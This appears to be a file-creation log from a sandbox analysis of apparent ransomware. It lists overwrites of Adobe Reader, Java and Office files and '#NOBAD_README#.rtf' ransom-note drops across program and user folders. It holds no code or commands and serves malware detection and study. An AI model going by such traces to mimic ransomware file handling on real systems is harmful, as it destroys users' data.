| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\activate-more-tools-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\activate-more-tools.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\beta-mobile-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-72x72-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\beta-mobile.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.bfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\hijrah-config-umalqura.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-right.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\combine-files.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\get-e-signatures-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.password.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\AppStore_icon.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ph4FbxSYkvNgOdef0l1h\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ph4FbxSYkvNgOdef0l1h\hZ7p_lTS0ptPK\VbgjHaG\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\AppStore_icon.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
